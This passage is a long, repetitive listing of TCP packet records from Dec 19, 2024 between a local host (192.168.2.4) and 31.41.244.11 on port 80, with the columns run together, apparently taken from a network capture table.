                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.309397936 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.312244892 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.312294006 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.312329054 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.312357903 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.313069105 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.313080072 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.313227892 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.314876080 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.314889908 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.314996004 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.315673113 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.315685034 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.315737009 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.317014933 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.317028046 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.317141056 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.317698002 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.317727089 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.317784071 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.319041967 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.319055080 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.319114923 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.319756031 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.319768906 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.319842100 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.319842100 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.321255922 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.321268082 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.321424007 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.322053909 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.322066069 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.322117090 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.323479891 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.323493958 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.323646069 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.324275017 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.324287891 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.324419022 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.325582027 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.325593948 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.325689077 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.326313972 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.326324940 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.326391935 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.327960014 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.327975988 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.328041077 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.328041077 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.328659058 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.328670979 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.328763008 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.329461098 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.329473019 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.329540968 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.331362963 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.331398964 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.331459999 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.331459999 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.332309961 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.332391024 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.333213091 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.333287954 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.333908081 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.333920956 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.334072113 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.334691048 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.334764957 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.335597992 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.335741997 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.336690903 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.336704969 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.336755991 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.339004993 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.339538097 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.339865923 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.339926004 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.343611956 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.343626022 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.343697071 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.343697071 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.346266031 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.347076893 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.347255945 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.348619938 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.348633051 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.348673105 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.348717928 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.349358082 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.349370003 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.349488020 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.350203037 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.350284100 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351041079 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351061106 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351070881 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351092100 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351109982 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351109982 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351134062 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351149082 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351885080 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351933002 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351944923 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.351994991 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.352018118 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.352814913 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.352828026 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.352838039 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.352921963 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.353693962 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.353719950 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.353730917 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.353746891 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.353787899 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.353787899 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.353847027 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.354547024 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.354559898 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.354572058 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.354609013 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.354643106 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.355617046 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.355629921 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.355640888 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.355681896 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.355701923 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.356981993 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.356995106 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.357006073 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.357017994 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.357065916 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.357065916 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.357835054 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.357856035 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.357871056 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.357916117 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.357916117 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.358695030 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.358755112 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.358767033 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.358839035 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.359688044 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.359700918 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.359710932 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.359721899 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.359744072 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.359788895 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.360423088 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.360435963 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.360446930 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.360492945 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.360492945 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.361253977 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.361320972 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.361323118 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.361335039 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.361371040 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.361397028 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.483338118 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.483490944 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.483675957 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.483768940 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.483854055 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.484035969 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.484091043 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.484371901 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.484461069 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.484600067 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.484652996 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.485172033 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.485264063 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.485369921 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.485832930 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.485886097 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.485972881 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.486017942 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.487349987 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.487361908 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.487422943 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.487422943 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.487912893 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.488648891 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.488737106 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.488895893 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.488907099 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.488955021 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.489015102 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.491597891 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.491610050 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.491739988 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.494504929 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.494518042 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.494621992 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.494621992 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.497801065 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.497814894 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.497867107 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.498682022 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.498701096 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.498759031 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.498759031 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.501234055 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.501246929 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.501298904 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.503601074 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.503654003 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.503746033 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.504574060 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.504585981 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.504645109 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.504705906 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.507029057 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.507042885 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.507141113 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.507854939 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.507966042 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.508769989 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.508913994 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.509502888 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.509515047 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.509635925 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.510533094 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.510545015 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.510612011 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.510612965 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.511343002 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.511357069 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.511476994 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.512180090 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.512192965 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.512233019 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.512417078 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.513008118 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.513020039 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.513108969 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.513822079 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.513834000 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.513914108 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.514792919 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.514803886 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.514872074 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.515916109 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.516726017 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.516850948 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.517816067 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.517827988 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.517838955 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.517859936 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.517904997 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.517904997 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.518646002 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.519718885 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.519792080 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.520390987 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.520410061 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.520474911 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.520474911 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.521182060 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.521193981 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.521301031 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.522033930 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.522044897 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.522150040 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.522824049 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.522835970 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.522921085 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.522921085 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.523658037 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.523669958 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.523732901 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.523734093 CET4973580192.168.2.431.41.244.11
